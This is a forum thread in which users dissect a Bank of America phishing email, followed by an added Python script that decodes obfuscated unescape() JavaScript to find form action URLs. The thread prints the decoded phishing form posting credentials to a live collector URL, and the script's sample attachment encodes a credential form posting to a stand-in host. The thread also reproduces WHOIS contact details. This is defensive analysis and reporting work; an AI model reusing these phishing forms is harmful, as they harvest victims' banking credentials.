
Doctor Four | My other vehicle is a TARDIS | Premium | join:2000-09-05 | Dallas, TX | AT&T U-Verse
[Phish] Curious BofA phish - manual input found no URLs
Any idea how I can get this one to properly submit to Phishtracker? It was one impersonating Bank of America, and instead of a clickable link or image in the email, there was only an HTML attachment. At the beginning of this and in the middle of the body there is some obfuscated JavaScript, and apparently the phish also contains some method for randomly varying the URL. This leads me to believe it is not only a Rock Phish, but Fast Flux as well.
I have posted the entire email as a text file for anyone who can parse it so Phishtracker will accept it. -- "The trouble with computers, of course, is that they are very sophisticated idiots." - Doctor Who (from Robot)
nwrickert | sand groper | Premium, MVM | join:2004-09-04 | Geneva, IL | AT&T U-Verse | AT&T Midwest
The phish contains obfuscated JavaScript, making it difficult to read.
I saved just the local part into a local file with the name "x.html". Then I browsed to that file with Firefox.
The page displayed contains a form for submitting credentials. The form is part of the email text, not from an external phishing site. According to Firefox, the completed form is to be posted to http://jajo-raq.signet.nl/libImage/demo.php
When I try that link (browsing to that link), I am redirected to a real BofA web site.
I did not try submitting to Phishtracker, since there was no visible link. If I really wanted to submit, I would have to modify the message to add a line containing that link. It's probably not worth the trouble since the details are in this thread. -- AT&T dsl; Speedstream 5100b modem; Zyxel NBG334W router; openSuSE 11.0; firefox 3.0.11

MGD | Premium, MVM | join:2002-07-31 | Fort Lauderdale, FL
reply to Doctor Four
The embedded form in that BOA phishing email shows it was originally copied and saved from: https://onlineeast.bankofamerica.com/cgi-bin/ias/4KT s2fjNOSVa4JgTQE9WI4BvbjhaFHngFjech7og29088/1/bofa/ibd/IAS/presentation/GotoResetPasscodeWithPinPage

As nwrickert noted, the submit button will activate a PHP script, demo.php, located at http://jajo-raq.signet.nl/libImage/demo.php, which will process the victim's data, generally by emailing it to the phisher or storing it in a local file.
The unescaped javascript:
Decodes to:
<form method="POST" action="http://jajo-raq.signet.nl/libImage/demo.php">
jajo-raq.signet.nl appears to be a home page for sites hosted in the Netherlands on signet.nl (www.signet.nl/). Sending a complaint to abuse[@]signet.nl to cancel the account.
Also, the phishing email appears to have originated from a compromised IP 198.60.105.201 in Colorado.
NetRange: 198.60.105.0 - 198.60.105.255
CIDR: 198.60.105.0/24
NetName: ZENEZ
NetHandle: NET-198-60-105-0-1
Parent: NET-198-59-0-0-1
NetType: Reassigned
Comment:
RegDate: 1994-10-21
Updated: 1994-10-21
RTechHandle: BLG-ARIN
RTechName: Gerber, Boyd Lynn
RTechPhone: +1-801-250-0795
RTechEmail:
OrgTechHandle: BLG-ARIN
OrgTechName: Gerber, Boyd Lynn
OrgTechPhone: +1-801-250-0795
OrgTechEmail: gerberb[@]zenez.com
And was relayed via a compromised email account on a server in Spain belonging to lontana-sureste.com
MGD
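The analysis nwrickert and MGD did by hand (open the HTML attachment, decode the unescape()-obfuscated JavaScript, read off the form's action URL) can be done offline without rendering the attachment in a browser. The script below is an added example, not code from this thread; the attachment text and the example.invalid hostnames in it are constructed.

```python
import re
import html
from urllib.parse import unquote

# Constructed sample: an HTML attachment whose credential form is hidden in a
# percent-encoded string passed to unescape(), as in the BofA phish above.
SAMPLE_ATTACHMENT = """<html><body>
<script>document.write(unescape('%3Cform%20method%3D%22POST%22%20action%3D%22http%3A%2F%2Fexample.invalid%2FlibImage%2Fdemo.php%22%3E%3Cinput%20name%3D%22pin%22%3E%3C%2Fform%3E'));</script>
<form method="post" action="https://example.invalid/second.php"><input name="user"></form>
</body></html>"""

# unescape('...') or unescape("...") with its string argument captured
UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
# <form ... action=URL ...>, quoted or unquoted attribute value
FORM_ACTION = re.compile(r"<form\b[^>]*?\baction\s*=\s*(['\"]?)([^'\"\s>]+)\1", re.I | re.S)

def decode_unescape_layers(src, max_rounds=5):
    """Replace every unescape('...') call with its percent-decoded payload,
    repeating so that nested layers of encoding are also unwrapped."""
    for _ in range(max_rounds):
        new = UNESCAPE_CALL.sub(lambda m: unquote(m.group(2)), src)
        if new == src:
            break
        src = new
    return src

def extract_form_actions(attachment):
    """Return the unique form action URLs in an HTML attachment, including
    those that only appear after the obfuscated JavaScript is decoded."""
    decoded = html.unescape(decode_unescape_layers(attachment))
    seen, actions = set(), []
    for m in FORM_ACTION.finditer(decoded):
        url = m.group(2)
        if url not in seen:
            seen.add(url)
            actions.append(url)
    return actions

if __name__ == "__main__":
    for url in extract_form_actions(SAMPLE_ATTACHMENT):
        print("form posts to:", url)
```

The recovered action URLs are what a takedown report or a Phishtracker-style submission needs; the attachment itself never has to be opened in a browser.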